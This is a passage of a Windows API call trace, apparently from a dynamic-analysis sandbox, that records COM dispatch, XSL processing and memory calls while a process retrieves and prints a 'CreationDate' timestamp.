[0566.329] DllRegisterServer () returned 0x0
[0566.331] IUnknown:QueryInterface (in: This=0x1fd57c0, riid=0x7fef591d588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0xadb60 | out: ppvObject=0xadb60*=0x1fd57f0) returned 0x0
[0566.331] IUnknown:Release (This=0x1fd57c0) returned 0x1
[0566.331] IUnknown:QueryInterface (in: This=0x1fd57f0, riid=0x7fef591d588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0xade60 | out: ppvObject=0xade60*=0x1fd57f0) returned 0x0
[0566.332] IDispatchEx:GetDispId (in: This=0x1fd57f0, bstrName="GetNamedItem", grfdex=0x8, pid=0xaddc8 | out: pid=0xaddc8*=83) returned 0x0
[0566.332] IUnknown:Release (This=0x1fd57f0) returned 0x1
[0566.332] IUnknown:AddRef (This=0x1fd57f0) returned 0x2
[0566.332] IUnknown:QueryInterface (in: This=0x1fd57f0, riid=0x7fef591d588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0xadb50 | out: ppvObject=0xadb50*=0x1fd57f0) returned 0x0
[0566.332] ??2@YAPEAX_K@Z () returned 0x18ff40
[0566.332] IDispatchEx:InvokeEx (in: This=0x1fd57f0, id=83, lcid=0x409, wFlags=0x3, pdp=0xadb28*(rgvarg=([0]=0x18ecd0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="NAME", varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarRes=0xadd68, pei=0xadb70, pspCaller=0x18ff40 | out: pdp=0xadb28*(rgvarg=([0]=0x18ecd0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="NAME", varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarRes=0xadd68*(varType=0x9, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1fda280, varVal2=0x0), pei=0xadb70*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0)) returned 0x0
[0566.332] IUnknown:Release (This=0x1fd57f0) returned 0x2
[0566.332] IUnknown:Release (This=0x1fd57f0) returned 0x1
[0566.332] IUnknown:QueryInterface (in: This=0x1fda280, riid=0x7fef591d588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0xadb60 | out: ppvObject=0xadb60*=0x1fda2b0) returned 0x0
[0566.333] IUnknown:Release (This=0x1fda280) returned 0x1
[0566.333] IUnknown:QueryInterface (in: This=0x1fda2b0, riid=0x7fef591d588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0xade78 | out: ppvObject=0xade78*=0x1fda2b0) returned 0x0
[0566.333] IDispatchEx:GetDispId (in: This=0x1fda2b0, bstrName="Value", grfdex=0x8, pid=0xaddcc | out: pid=0xaddcc*=120) returned 0x0
[0566.333] IUnknown:Release (This=0x1fda2b0) returned 0x1
[0566.333] IUnknown:AddRef (This=0x1fda2b0) returned 0x2
[0566.333] IUnknown:QueryInterface (in: This=0x1fda2b0, riid=0x7fef591d588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0xadb50 | out: ppvObject=0xadb50*=0x1fda2b0) returned 0x0
[0566.333] IDispatchEx:InvokeEx (in: This=0x1fda2b0, id=120, lcid=0x409, wFlags=0x3, pdp=0xadb28*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarRes=0x18ece8, pei=0xadb70, pspCaller=0x18ff40 | out: pdp=0xadb28*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarRes=0x18ece8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="CreationDate", varVal2=0x0), pei=0xadb70*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0)) returned 0x0
[0566.334] IUnknown:Release (This=0x1fda2b0) returned 0x2
[0566.334] IUnknown:Release (This=0x1fda2b0) returned 0x1
[0566.334] memcpy (in: _Dst=0x18f828, _Src=0x7fef5931978, _Size=0x10 | out: _Dst=0x18f828) returned 0x18f828
[0566.335] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="PROPERTY", cchCount1=8, lpString2="Property.Array", cchCount2=14) returned 1
[0566.335] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="PROPERTY", cchCount1=8, lpString2="Property.Reference", cchCount2=18) returned 1
[0566.336] memcpy (in: _Dst=0x18f878, _Src=0x7fef5933a60, _Size=0xa | out: _Dst=0x18f878) returned 0x18f878
[0566.336] memcpy (in: _Dst=0x18f8c8, _Src=0x7fef5932208, _Size=0x10 | out: _Dst=0x18f8c8) returned 0x18f8c8
[0566.338] memcpy (in: _Dst=0x2f9f98, _Src=0x2fa6c8, _Size=0x32 | out: _Dst=0x2f9f98) returned 0x2f9f98
[0566.339] malloc (_Size=0x808) returned 0x390440
[0566.339] memcpy (in: _Dst=0x390488, _Src=0x7fef5933b10, _Size=0xa | out: _Dst=0x390488) returned 0x390488
[0566.339] memcpy (in: _Dst=0x35bac8, _Src=0x2fa6c8, _Size=0x32 | out: _Dst=0x35bac8) returned 0x35bac8
[0566.339] GetCurrentThreadId () returned 0x440
[0566.339] DllRegisterServer () returned 0x0
[0566.340] ??3@YAXPEAX@Z () returned 0x303e1201
[0566.340] ISystemDebugEventFire:IsActive (This=0x30b4e0) returned 0x1
[0566.340] free (_Block=0x391450)
[0566.340] ??3@YAXPEAX@Z () returned 0x20016900580001
[0566.340] ??3@YAXPEAX@Z () returned 0x303e1201
[0566.341] ??3@YAXPEAX@Z () returned 0x303e1201
[0566.341] free (_Block=0x18fdc0)
[0566.341] GetCurrentThreadId () returned 0x440
[0566.341] realloc (_Block=0x0, _Size=0xc8) returned 0x18fdc0
[0566.341] memcpy (in: _Dst=0x18fdc0, _Src=0x7fef5930800, _Size=0x10 | out: _Dst=0x18fdc0) returned 0x18fdc0
[0566.341] memcpy (in: _Dst=0x18fdd0, _Src=0x7fef591f2c8, _Size=0x6 | out: _Dst=0x18fdd0) returned 0x18fdd0
[0566.341] memcpy (in: _Dst=0x18fdd6, _Src=0x7fef591f2d0, _Size=0x18 | out: _Dst=0x18fdd6) returned 0x18fdd6
[0566.341] ??2@YAPEAX_K@Z () returned 0x1887c0
[0566.341] malloc (_Size=0x1008) returned 0x390c50
[0566.341] ??2@YAPEAX_K@Z () returned 0x391c60
[0566.341] malloc (_Size=0x2008) returned 0x391df0
[0566.341] memcpy (in: _Dst=0x391e24, _Src=0x25b1960, _Size=0x1a | out: _Dst=0x391e24) returned 0x391e24
[0566.341] malloc (_Size=0x108) returned 0x18ac30
[0566.342] memcpy (in: _Dst=0x391e74, _Src=0x25b197c, _Size=0x8 | out: _Dst=0x391e74) returned 0x391e74
[0566.342] ??3@YAXPEAX@Z () returned 0x303e1201
[0566.342] malloc (_Size=0x208) returned 0x393e00
[0566.342] malloc (_Size=0x40) returned 0x18fe90
[0566.342] malloc (_Size=0x138) returned 0x391c60
[0566.342] memcpy (in: _Dst=0x391c60, _Src=0xae7c0, _Size=0x30 | out: _Dst=0x391c60) returned 0x391c60
[0566.342] memcpy (in: _Dst=0x391c98, _Src=0x391e74, _Size=0xa | out: _Dst=0x391c98) returned 0x391c98
[0566.342] memcpy (in: _Dst=0x391cac, _Src=0x391e24, _Size=0x1c | out: _Dst=0x391cac) returned 0x391cac
[0566.342] memcpy (in: _Dst=0x391cc8, _Src=0x0, _Size=0x0 | out: _Dst=0x391cc8) returned 0x391cc8
[0566.342] memcpy (in: _Dst=0x391cc8, _Src=0x18fe90, _Size=0x8 | out: _Dst=0x391cc8) returned 0x391cc8
[0566.342] memcpy (in: _Dst=0x391cd8, _Src=0xaed80, _Size=0x20 | out: _Dst=0x391cd8) returned 0x391cd8
[0566.342] memcpy (in: _Dst=0x391cf8, _Src=0x18fdc0, _Size=0x30 | out: _Dst=0x391cf8) returned 0x391cf8
[0566.342] memcpy (in: _Dst=0x391d28, _Src=0x25b1960, _Size=0x26 | out: _Dst=0x391d28) returned 0x391d28
[0566.342] memcpy (in: _Dst=0x391d50, _Src=0x393e20, _Size=0x30 | out: _Dst=0x391d50) returned 0x391d50
[0566.342] memcpy (in: _Dst=0x391d80, _Src=0x393e5c, _Size=0x13 | out: _Dst=0x391d80) returned 0x391d80
[0566.342] ??2@YAPEAX_K@Z () returned 0x1895a0
[0566.343] free (_Block=0x391df0)
[0566.343] free (_Block=0x390c50)
[0566.343] ??3@YAXPEAX@Z () returned 0x74007900820001
[0566.344] free (_Block=0x18fe90)
[0566.344] free (_Block=0x393e00)
[0566.345] free (_Block=0x18ac30)
[0566.345] ??2@YAPEAX_K@Z () returned 0x18fe90
[0566.345] memcpy (in: _Dst=0x18d9b0, _Src=0xaec60, _Size=0x10 | out: _Dst=0x18d9b0) returned 0x18d9b0
[0566.345] ??2@YAPEAX_K@Z () returned 0x18fef0
[0566.345] ISystemDebugEventFire:IsActive (This=0x30b4e0) returned 0x1
[0566.345] GetCurrentThreadId () returned 0x440
[0566.346] DllRegisterServer () returned 0x0
[0566.346] realloc (_Block=0x0, _Size=0x140) returned 0x390c50
[0566.346] memcpy (in: _Dst=0x390c50, _Src=0x18f010, _Size=0xa0 | out: _Dst=0x390c50) returned 0x390c50
[0566.346] memcpy (in: _Dst=0x3904d8, _Src=0x7fef5930398, _Size=0x8 | out: _Dst=0x3904d8) returned 0x3904d8
[0566.347] memcpy (in: _Dst=0x390520, _Src=0x7fef59303f0, _Size=0x8 | out: _Dst=0x390520) returned 0x390520
[0566.347] memcpy (in: _Dst=0x36c1d8, _Src=0x2fa628, _Size=0x2 | out: _Dst=0x36c1d8) returned 0x36c1d8
[0566.347] memcpy (in: _Dst=0x390568, _Src=0x7fef5931c40, _Size=0xa | out: _Dst=0x390568) returned 0x390568
[0566.347] memcpy (in: _Dst=0x36c1d8, _Src=0x2fa62a, _Size=0x2 | out: _Dst=0x36c1d8) returned 0x36c1d8
[0566.347] memcpy (in: _Dst=0x36c1d8, _Src=0x2fa62c, _Size=0x2 | out: _Dst=0x36c1d8) returned 0x36c1d8
[0566.347] memcpy (in: _Dst=0x36c1d8, _Src=0x2fa62e, _Size=0x2 | out: _Dst=0x36c1d8) returned 0x36c1d8
[0566.348] memcpy (in: _Dst=0x36c1d8, _Src=0x2fa630, _Size=0x2 | out: _Dst=0x36c1d8) returned 0x36c1d8
[0566.348] memcpy (in: _Dst=0x36c1d8, _Src=0x2fa632, _Size=0x2 | out: _Dst=0x36c1d8) returned 0x36c1d8
[0566.348] memcpy (in: _Dst=0x36c1d8, _Src=0x2fa634, _Size=0x2 | out: _Dst=0x36c1d8) returned 0x36c1d8
[0566.348] memcpy (in: _Dst=0x36c1d8, _Src=0x2fa636, _Size=0x2 | out: _Dst=0x36c1d8) returned 0x36c1d8
[0566.348] memcpy (in: _Dst=0x36c1d8, _Src=0x2fa638, _Size=0x2 | out: _Dst=0x36c1d8) returned 0x36c1d8
[0566.349] memcpy (in: _Dst=0x36c1d8, _Src=0x2fa63a, _Size=0x2 | out: _Dst=0x36c1d8) returned 0x36c1d8
[0566.349] memcpy (in: _Dst=0x36c1d8, _Src=0x2fa63c, _Size=0x2 | out: _Dst=0x36c1d8) returned 0x36c1d8
[0566.349] memcpy (in: _Dst=0x36c1d8, _Src=0x2fa63e, _Size=0x2 | out: _Dst=0x36c1d8) returned 0x36c1d8
[0566.350] memcpy (in: _Dst=0x36c1d8, _Src=0x35bac8, _Size=0x2 | out: _Dst=0x36c1d8) returned 0x36c1d8
[0566.350] memcpy (in: _Dst=0x36c1d8, _Src=0x35baca, _Size=0x2 | out: _Dst=0x36c1d8) returned 0x36c1d8
[0566.351] memcpy (in: _Dst=0x36c1d8, _Src=0x35bacc, _Size=0x2 | out: _Dst=0x36c1d8) returned 0x36c1d8
[0566.351] memcpy (in: _Dst=0x36c1d8, _Src=0x35bace, _Size=0x2 | out: _Dst=0x36c1d8) returned 0x36c1d8
[0566.351] memcpy (in: _Dst=0x36c1d8, _Src=0x35bad0, _Size=0x2 | out: _Dst=0x36c1d8) returned 0x36c1d8
[0566.351] memcpy (in: _Dst=0x36c1d8, _Src=0x35bad2, _Size=0x2 | out: _Dst=0x36c1d8) returned 0x36c1d8
[0566.351] memcpy (in: _Dst=0x36c1d8, _Src=0x35bad4, _Size=0x2 | out: _Dst=0x36c1d8) returned 0x36c1d8
[0566.352] memcpy (in: _Dst=0x36c1d8, _Src=0x35bad6, _Size=0x2 | out: _Dst=0x36c1d8) returned 0x36c1d8
[0566.352] memcpy (in: _Dst=0x36c1d8, _Src=0x35bad8, _Size=0x2 | out: _Dst=0x36c1d8) returned 0x36c1d8
[0566.352] memcpy (in: _Dst=0x36c1d8, _Src=0x35bada, _Size=0x2 | out: _Dst=0x36c1d8) returned 0x36c1d8
[0566.352] memcpy (in: _Dst=0x36c1d8, _Src=0x35badc, _Size=0x2 | out: _Dst=0x36c1d8) returned 0x36c1d8
[0566.352] memcpy (in: _Dst=0x36c1d8, _Src=0x35bade, _Size=0x2 | out: _Dst=0x36c1d8) returned 0x36c1d8
[0566.353] memcpy (in: _Dst=0x36c1d8, _Src=0x35bae0, _Size=0x2 | out: _Dst=0x36c1d8) returned 0x36c1d8
[0566.353] memcpy (in: _Dst=0x36c1d8, _Src=0x35bae2, _Size=0x2 | out: _Dst=0x36c1d8) returned 0x36c1d8
[0566.353] memcpy (in: _Dst=0x36c1d8, _Src=0x35bae4, _Size=0x2 | out: _Dst=0x36c1d8) returned 0x36c1d8
[0566.353] memcpy (in: _Dst=0x36c1d8, _Src=0x35bae6, _Size=0x2 | out: _Dst=0x36c1d8) returned 0x36c1d8
[0566.354] memcpy (in: _Dst=0x36c1d8, _Src=0x35bae8, _Size=0x2 | out: _Dst=0x36c1d8) returned 0x36c1d8
[0566.354] memcpy (in: _Dst=0x36c1d8, _Src=0x35baea, _Size=0x2 | out: _Dst=0x36c1d8) returned 0x36c1d8
[0566.354] memcpy (in: _Dst=0x36c1d8, _Src=0x35baec, _Size=0x2 | out: _Dst=0x36c1d8) returned 0x36c1d8
[0566.354] memcpy (in: _Dst=0x36c1d8, _Src=0x35baee, _Size=0x2 | out: _Dst=0x36c1d8) returned 0x36c1d8
[0566.354] memcpy (in: _Dst=0x36c1d8, _Src=0x35baf0, _Size=0x2 | out: _Dst=0x36c1d8) returned 0x36c1d8
[0566.355] memcpy (in: _Dst=0x36c1d8, _Src=0x35baf2, _Size=0x2 | out: _Dst=0x36c1d8) returned 0x36c1d8
[0566.355] memcpy (in: _Dst=0x36c1d8, _Src=0x35baf4, _Size=0x2 | out: _Dst=0x36c1d8) returned 0x36c1d8
[0566.355] memcpy (in: _Dst=0x36c1d8, _Src=0x35baf6, _Size=0x2 | out: _Dst=0x36c1d8) returned 0x36c1d8
[0566.355] memcpy (in: _Dst=0x36c1d8, _Src=0x35baf8, _Size=0x2 | out: _Dst=0x36c1d8) returned 0x36c1d8
[0566.356] memcpy (in: _Dst=0x36c1d8, _Src=0x2fa628, _Size=0x2 | out: _Dst=0x36c1d8) returned 0x36c1d8
[0566.357] memcpy (in: _Dst=0x36c1d8, _Src=0x2fa62a, _Size=0x2 | out: _Dst=0x36c1d8) returned 0x36c1d8
[0566.357] memcpy (in: _Dst=0x36c1d8, _Src=0x2fa62c, _Size=0x2 | out: _Dst=0x36c1d8) returned 0x36c1d8
[0566.357] memcpy (in: _Dst=0x36c1d8, _Src=0x2fa62e, _Size=0x2 | out: _Dst=0x36c1d8) returned 0x36c1d8
[0566.357] memcpy (in: _Dst=0x36c1d8, _Src=0x2fa630, _Size=0x2 | out: _Dst=0x36c1d8) returned 0x36c1d8
[0566.357] memcpy (in: _Dst=0x36c1d8, _Src=0x2fa632, _Size=0x2 | out: _Dst=0x36c1d8) returned 0x36c1d8
[0566.358] memcpy (in: _Dst=0x36c1d8, _Src=0x2fa634, _Size=0x2 | out: _Dst=0x36c1d8) returned 0x36c1d8
[0566.358] memcpy (in: _Dst=0x36c1d8, _Src=0x2fa636, _Size=0x2 | out: _Dst=0x36c1d8) returned 0x36c1d8
[0566.358] memcpy (in: _Dst=0x36c1d8, _Src=0x2fa638, _Size=0x2 | out: _Dst=0x36c1d8) returned 0x36c1d8
[0566.358] memcpy (in: _Dst=0x36c1d8, _Src=0x2fa63a, _Size=0x2 | out: _Dst=0x36c1d8) returned 0x36c1d8
[0566.358] memcpy (in: _Dst=0x36c1d8, _Src=0x2fa63c, _Size=0x2 | out: _Dst=0x36c1d8) returned 0x36c1d8
[0566.359] memcpy (in: _Dst=0x36c1d8, _Src=0x2fa63e, _Size=0x2 | out: _Dst=0x36c1d8) returned 0x36c1d8
[0566.359] memcpy (in: _Dst=0x2fa3f8, _Src=0x36c1d8, _Size=0x0 | out: _Dst=0x2fa3f8) returned 0x2fa3f8
[0566.359] memcpy (in: _Dst=0x2fa3f8, _Src=0x2fa628, _Size=0x18 | out: _Dst=0x2fa3f8) returned 0x2fa3f8
[0566.360] memcpy (in: _Dst=0x3905b8, _Src=0x7fef59303c0, _Size=0xa | out: _Dst=0x3905b8) returned 0x3905b8
[0566.360] memcpy (in: _Dst=0x2f9f98, _Src=0x2fa6c8, _Size=0x1e | out: _Dst=0x2f9f98) returned 0x2f9f98
[0566.360] memcpy (in: _Dst=0x2fa6c8, _Src=0x2fa3f8, _Size=0x18 | out: _Dst=0x2fa6c8) returned 0x2fa6c8
[0566.360] memcpy (in: _Dst=0x2fa6e0, _Src=0x2f9f98, _Size=0x1e | out: _Dst=0x2fa6e0) returned 0x2fa6e0
[0566.361] memcpy (in: _Dst=0x36c1d8, _Src=0x35bac8, _Size=0x2 | out: _Dst=0x36c1d8) returned 0x36c1d8
[0566.361] memcpy (in: _Dst=0x36c1d8, _Src=0x35baca, _Size=0x2 | out: _Dst=0x36c1d8) returned 0x36c1d8
[0566.361] memcpy (in: _Dst=0x36c1d8, _Src=0x35bacc, _Size=0x2 | out: _Dst=0x36c1d8) returned 0x36c1d8
[0566.362] memcpy (in: _Dst=0x36c1d8, _Src=0x35bace, _Size=0x2 | out: _Dst=0x36c1d8) returned 0x36c1d8
[0566.362] memcpy (in: _Dst=0x36c1d8, _Src=0x35bad0, _Size=0x2 | out: _Dst=0x36c1d8) returned 0x36c1d8
[0566.362] memcpy (in: _Dst=0x36c1d8, _Src=0x35bad2, _Size=0x2 | out: _Dst=0x36c1d8) returned 0x36c1d8
[0566.362] memcpy (in: _Dst=0x36c1d8, _Src=0x35bad4, _Size=0x2 | out: _Dst=0x36c1d8) returned 0x36c1d8
[0566.362] memcpy (in: _Dst=0x36c1d8, _Src=0x35bad6, _Size=0x2 | out: _Dst=0x36c1d8) returned 0x36c1d8
[0566.363] memcpy (in: _Dst=0x36c1d8, _Src=0x35bad8, _Size=0x2 | out: _Dst=0x36c1d8) returned 0x36c1d8
[0566.363] memcpy (in: _Dst=0x36c1d8, _Src=0x35bada, _Size=0x2 | out: _Dst=0x36c1d8) returned 0x36c1d8
[0566.363] memcpy (in: _Dst=0x36c1d8, _Src=0x35badc, _Size=0x2 | out: _Dst=0x36c1d8) returned 0x36c1d8
[0566.363] memcpy (in: _Dst=0x36c1d8, _Src=0x35bade, _Size=0x2 | out: _Dst=0x36c1d8) returned 0x36c1d8
[0566.364] memcpy (in: _Dst=0x36c1d8, _Src=0x35bae0, _Size=0x2 | out: _Dst=0x36c1d8) returned 0x36c1d8
[0566.364] memcpy (in: _Dst=0x36c1d8, _Src=0x35bae2, _Size=0x2 | out: _Dst=0x36c1d8) returned 0x36c1d8
[0566.364] memcpy (in: _Dst=0x36c1d8, _Src=0x35bae4, _Size=0x2 | out: _Dst=0x36c1d8) returned 0x36c1d8
[0566.364] memcpy (in: _Dst=0x36c1d8, _Src=0x35bae6, _Size=0x2 | out: _Dst=0x36c1d8) returned 0x36c1d8
[0566.364] memcpy (in: _Dst=0x36c1d8, _Src=0x35bae8, _Size=0x2 | out: _Dst=0x36c1d8) returned 0x36c1d8
[0566.365] memcpy (in: _Dst=0x36c1d8, _Src=0x35baea, _Size=0x2 | out: _Dst=0x36c1d8) returned 0x36c1d8
[0566.365] memcpy (in: _Dst=0x36c1d8, _Src=0x35baec, _Size=0x2 | out: _Dst=0x36c1d8) returned 0x36c1d8
[0566.365] memcpy (in: _Dst=0x36c1d8, _Src=0x35baee, _Size=0x2 | out: _Dst=0x36c1d8) returned 0x36c1d8
[0566.365] memcpy (in: _Dst=0x36c1d8, _Src=0x35baf0, _Size=0x2 | out: _Dst=0x36c1d8) returned 0x36c1d8
[0566.366] memcpy (in: _Dst=0x36c1d8, _Src=0x35baf2, _Size=0x2 | out: _Dst=0x36c1d8) returned 0x36c1d8
[0566.366] memcpy (in: _Dst=0x36c1d8, _Src=0x35baf4, _Size=0x2 | out: _Dst=0x36c1d8) returned 0x36c1d8
[0566.366] memcpy (in: _Dst=0x36c1d8, _Src=0x35baf6, _Size=0x2 | out: _Dst=0x36c1d8) returned 0x36c1d8
[0566.366] memcpy (in: _Dst=0x36c1d8, _Src=0x35baf8, _Size=0x2 | out: _Dst=0x36c1d8) returned 0x36c1d8
[0566.367] memcpy (in: _Dst=0x2f9f98, _Src=0x36c1d8, _Size=0x0 | out: _Dst=0x2f9f98) returned 0x2f9f98
[0566.367] memcpy (in: _Dst=0x2f9f98, _Src=0x35bac8, _Size=0x32 | out: _Dst=0x2f9f98) returned 0x2f9f98
[0566.368] memcpy (in: _Dst=0x36c208, _Src=0x2fa3f8, _Size=0x4 | out: _Dst=0x36c208) returned 0x36c208
[0566.368] memcpy (in: _Dst=0x2fa3f8, _Src=0x2f9f98, _Size=0x32 | out: _Dst=0x2fa3f8) returned 0x2fa3f8
[0566.368] memcpy (in: _Dst=0x2fa42a, _Src=0x36c208, _Size=0x4 | out: _Dst=0x2fa42a) returned 0x2fa42a
[0566.368] memcpy (in: _Dst=0x390608, _Src=0x7fef5930620, _Size=0xe | out: _Dst=0x390608) returned 0x390608
[0566.368] memcpy (in: _Dst=0x348828, _Src=0x2fa3f8, _Size=0x36 | out: _Dst=0x348828) returned 0x348828
[0566.368] memcpy (in: _Dst=0x34885e, _Src=0x36c208, _Size=0x4 | out: _Dst=0x34885e) returned 0x34885e
[0566.369] memcpy (in: _Dst=0x2fb808, _Src=0x2fa6c8, _Size=0x36 | out: _Dst=0x2fb808) returned 0x2fb808
[0566.369] memcpy (in: _Dst=0x2fb83e, _Src=0x36c208, _Size=0x4 | out: _Dst=0x2fb83e) returned 0x2fb83e
[0566.369] memcpy (in: _Dst=0x308ff8, _Src=0x2fb808, _Size=0x3a | out: _Dst=0x308ff8) returned 0x308ff8
[0566.369] memcpy (in: _Dst=0x309032, _Src=0x348828, _Size=0x3a | out: _Dst=0x309032) returned 0x309032
[0566.369] GetCurrentThreadId () returned 0x440
[0566.369] DllRegisterServer () returned 0x0
[0566.370] ??3@YAXPEAX@Z () returned 0x303e1201
[0566.370] ISystemDebugEventFire:IsActive (This=0x30b4e0) returned 0x1
[0566.370] free (_Block=0x391c60)
[0566.370] ??3@YAXPEAX@Z () returned 0x20016a00580001
[0566.370] ??3@YAXPEAX@Z () returned 0x303e1201
[0566.371] free (_Block=0x18fdc0)
[0566.371] GetCurrentThreadId () returned 0x440
[0566.371] GetCurrentThreadId () returned 0x440
[0566.371] IUnknown:Release (This=0x30b4e0) returned 0x1
[0566.371] DllRegisterServer () returned 0x0
[0566.371] DllRegisterServer () returned 0x0
[0566.371] GetUserDefaultLCID () returned 0x409
[0566.371] GetACP () returned 0x4e4
[0566.371] ??3@YAXPEAX@Z () returned 0x20016b005c0001
[0566.371] ??3@YAXPEAX@Z () returned 0x303e1201
[0566.371] ??3@YAXPEAX@Z () returned 0x303e1201
[0566.371] ??3@YAXPEAX@Z () returned 0x303e1201
[0566.372] ??3@YAXPEAX@Z () returned 0x303e1201
[0566.372] ??3@YAXPEAX@Z () returned 0x303e1201
[0566.372] ??3@YAXPEAX@Z () returned 0x303e1201
[0566.415] free (_Block=0x18f0c0)
[0566.415] free (_Block=0x390c50)
[0566.416] free (_Block=0x390440)
[0566.416] free (_Block=0x18f4f0)
[0566.416] free (_Block=0x18f1f0)
[0566.417] free (_Block=0x18ab20)
[0566.417] ??3@YAXPEAX@Z () returned 0x303e1201
[0566.417] ??3@YAXPEAX@Z () returned 0x74007a007e0001
[0566.417] ISystemDebugEventFire:EndSession (This=0x30b4e0) returned 0x0
[0566.417] IUnknown:Release (This=0x30b4e0) returned 0x0
[0566.417] ??3@YAXPEAX@Z () returned 0x303e1201
[0566.417] ??3@YAXPEAX@Z () returned 0x303e1201
[0566.417] ??3@YAXPEAX@Z () returned 0x303e1201
[0566.417] DllRegisterServer () returned 0x0
[0566.418] IXSLProcessor:get_output (in: This=0x1fd9640, pOutput=0xaf260 | out: pOutput=0xaf260*(varType=0x8, wReserved1=0x1fd, wReserved2=0x0, wReserved3=0x0, varVal1="CreationDate \r\n20240603113412.436800+120 \r\n", varVal2=0x1)) returned 0x0
[0566.418] malloc (_Size=0x18) returned 0x189040
[0566.418] XSLTemplate:IUnknown:Release (This=0x1fd9640) returned 0x0
[0566.418] FreeThreadedDOMDocument:IUnknown:Release (This=0x1fdb330) returned 0x2
[0566.418] XSLTemplate:IUnknown:Release (This=0x1fd7620) returned 0x0
[0566.419] memcpy (in: _Dst=0xaefe0, _Src=0x18d9a0, _Size=0x10 | out: _Dst=0xaefe0) returned 0xaefe0
[0566.419] free (_Block=0x38c430)
[0566.420] ??3@YAXPEAX@Z () returned 0x20016c005c0001
[0566.420] ??3@YAXPEAX@Z () returned 0x303e1201
[0566.421] free (_Block=0x18d9a0)
[0566.421] ??3@YAXPEAX@Z () returned 0x45004c000e0001
[0566.421] ??3@YAXPEAX@Z () returned 0x303e1201
[0566.422] ??1CHString@@QEAA@XZ () returned 0x7fef5b8c96c
[0566.422] free (_Block=0x1886c0)
[0566.422] free (_Block=0x18cee0)
[0566.422] malloc (_Size=0x80) returned 0x18fdc0
[0566.422] memcpy_s (in: _Destination=0x18fdc0, _DestinationSize=0x7e, _Source=0x309088, _SourceSize=0x74 | out: _Destination=0x18fdc0) returned 0x0
[0566.422] malloc (_Size=0x30) returned 0x1886c0
[0566.423] free (_Block=0x1886c0)
[0566.423] malloc (_Size=0x40) returned 0x18fe50
[0566.423] memcpy_s (in: _Destination=0x18fe50, _DestinationSize=0x3e, _Source=0x18fdc0, _SourceSize=0x3a | out: _Destination=0x18fe50) returned 0x0
[0566.423] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="CreationDate \r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30
[0566.423] malloc (_Size=0x1e) returned 0x18cee0
[0566.423] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="CreationDate \r\n", cchWideChar=-1, lpMultiByteStr=0x18cee0, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreationDate \r\n", lpUsedDefaultChar=0x0) returned 30
[0566.423] fprintf (in: _File=0x7feff772ab0, _Format="%s" | out: _File=0x7feff772ab0) returned 29
[0566.423] fflush (in: _File=0x7feff772ab0 | out: _File=0x7feff772ab0) returned 0
[0566.432] free (_Block=0x18cee0)
[0566.432] free (_Block=0x18fe50)
[0566.432] malloc (_Size=0x40) returned 0x18fe50
[0566.433] memcpy_s (in: _Destination=0x18fe50, _DestinationSize=0x3e, _Source=0x18fdfa, _SourceSize=0x3a | out: _Destination=0x18fe50) returned 0x0
[0566.433] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="20240603113412.436800+120 \r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30
[0566.433] malloc (_Size=0x1e) returned 0x18cee0
[0566.433] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="20240603113412.436800+120 \r\n", cchWideChar=-1, lpMultiByteStr=0x18cee0, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="20240603113412.436800+120 \r\n", lpUsedDefaultChar=0x0) returned 30
